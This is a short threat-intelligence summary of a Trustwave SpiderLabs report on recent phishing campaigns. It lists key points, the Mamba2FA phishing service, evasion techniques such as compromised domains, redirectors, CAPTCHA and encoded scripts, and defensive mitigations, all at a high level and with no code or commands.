Full Report
In recent months, Trustwave SpiderLabs, A LevelBlue Company, saw a significant increase in phishing URLs containing familiar patterns, similar phishing templates, and a resurgence in the use of email marketing platforms. The use of URL redirectors, along with the abuse of Amazon Web Hosting and Cloudflare services, was also widely observed.
Analysis Summary
# Unraveling Phishing Campaigns Flagged by Trustwave’s URL Scanner
### LevelBlue Completes Acquisition of Trustwave to Form the World's Largest Pure-Play MSSP
## Key Points
- Threat actors frequently compromise legitimate domains to avoid detection and deceive victims.
- Phishing pages are challenging to detect due to their constantly changing content and use of evasion methods like CAPTCHA and encoded scripts.
- Trustwave’s URL scanner effectively identifies threats using machine learning and domain expert rules.
## Threat Actors
- **Mamba2FA**: A phishing service used in conjunction with compromised domains and redirectors.
- No specific attribution available for the recent campaign.
## TTPs
- Compromised legitimate domains to avoid detection.
- Use of redirection techniques, including Cloudflare Turnstile.
- Employing evasion methods such as CAPTCHA and encoded scripts.
## Affected Systems
- Legitimate domains used by threat actors are often benign and related to freight services or other unrelated industries.
## Mitigations
- Utilize machine learning and domain expert rules for URL scanning, as seen with Trustwave’s URL scanner.
- Implement robust security controls to prevent phishing attacks, including employee education and awareness programs.
- Regularly update and patch systems to avoid exploitation of known vulnerabilities.